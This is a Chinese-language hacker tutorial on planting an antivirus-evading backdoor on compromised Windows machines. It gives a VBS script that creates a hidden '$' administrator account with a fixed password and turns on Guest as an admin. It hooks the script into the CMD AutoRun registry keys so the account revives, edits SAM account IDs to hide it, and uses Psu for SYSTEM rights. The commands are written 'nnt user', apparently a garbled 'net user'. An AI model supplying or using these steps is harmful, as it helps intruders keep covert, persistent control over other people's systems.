分解后门查核心——打造杀毒软件PASS的后门
 

在安全观念日益强化的今天，想得到台属于自己的肉鸡是不易的，如果说因为管理员发现了自己留在肉鸡上的后门账号而导致肉鸡丢失的话，那就是世间最痛苦的事了，相信大家都不会希望这种事情发生在自己的身上吧！这时候用什么后门来控制肉鸡就成为最让人头疼的问题，而好后门的关键就在于是否会被查杀，下文一起来看看如何打造出自己的免查杀后门吧！
　　Superdoor3.0这款软件大家都用过或者听过吧？它只有一个可执行程序，文件本身很小，命令简单。运行后，可以起到隐藏账号的效果，管理员在CMD下用“nnt user”查看用户账号，或者用计算机管理来维护用户账号时，账号都会自动隐藏。使用方法也特别简单，只需要键入如下命令就行了：
door <用户名>：<口令>
小提示：Superdoor3.0(超级后门3.0)，超级用户隐藏器。
运行环境：测试2000通过（须VB运行库）。
运行方法：door <用户>:<密码>例：administrator:123。
功能：它在打开“计算机管理”和CMD时把用户删掉，管理员看过用户后，关闭“计算机管理”或CMD时，用户又回来了，巧妙地躲开管理员的查看，是宝鸡必备良药。

　　不过使用这个后门建立隐藏帐户容易，后门被发现也很容易。我使用杀毒软件（Norton Anti Virus）查了一下。在/winnt/system32/下会生成一个Cmd.exe文件和感染Conpmgmt.exe文件。
　　

哎，看来Superdoor早就被列入杀毒名单了。而且在杀毒软件将后门程序删除后，再运行CMD命令行回在它上面多出一句：“c:\WINNT\system32\crnd.exe"不是外部或内部命令，也不是可运行的程序或批处理文件”。

看来是文件关联被动了手脚了。经过查找，发现程序写入下面两个键值：
HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\下的\Software\Microsoft\Command Processor\Auto Run
先看看这两个位置的介绍：如果/D未在命令行上被指定，当Cmd.exe运行时，它会自动寻找以下Reg_sz/reg_expand_sz注册表变量。如果其中一个或两个都存在，这两个变量会先予执行。也就是说，只要启动了CMD就会运行上述的脚本，可以说是CMD关联吧。

达到“账号如果被撤除，运行CMD又恢复”的效果，原理就是这样的了。现在我们来根据原理做个不被杀的后门。先建立一个名字为RUN的VBS文件，保存在C:/winnt/system32/下，内容如下：
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "nnt user hsmw$ QQ26836659",0
wsh.run "nnt localgroup administrators hsmw$ /add",0
wsh.run "nnt user guest /active:yes",0
wsh.run "nnt user guest QQ26836659",0
wsh.run "nnt localgroup administrators hsmw$ /add",0
上面一段VBS的意思就是建立个hsmw$的账号，并且加为高级管理组，设置密码为QQ26836659，激活Guest账号，并且加为高级管理组，设置密码为QQ26836659。写入注册表中下面的键，关联CMD达到不死的效果：
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Auto Run
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run

小提示：在账号后面加入$是为了在输入“nnt user”时不被轻易地发现，虽然是个“不死账号”，但是在计算机管理可以轻易的查到。

我们添加完例如“?$$”这样账号以后，在注册表中找到这个有字符“$账号”对应的ID值，具体的位置在：
KEY_LOCAL_MACHINE\SAM\SAM\ Domains\Account\User
将有字符$账号对应的ID的键值修改为一个不存在的ID键值。例如：某账号的键值为0x4eb，修改为0x6eb，那么这个含有字符$的账号就没有ID了，重新启动后，用户管界面里也就看不到这个账号了！
　　这里需要注意一点，要打开注册表中的SAM需要System权限，Admin权限是不行的，不过不要着急。这里我们可以用Psu这个软件轻松提升权限，先用Pslist查看Winlogon.exe的PID值为212，然后输入“Psu -p regedit -i 212”就可以了。
　　
　　好了，前面的VBS的功能是在CMD下用“nnt user命令”看不见，后者是在计算机管理里看不见，结合起来一个新的后门出世了，用杀毒软件来查一查：PASS！哈哈，成功！
　　有不足之处，还请赐教，谢谢！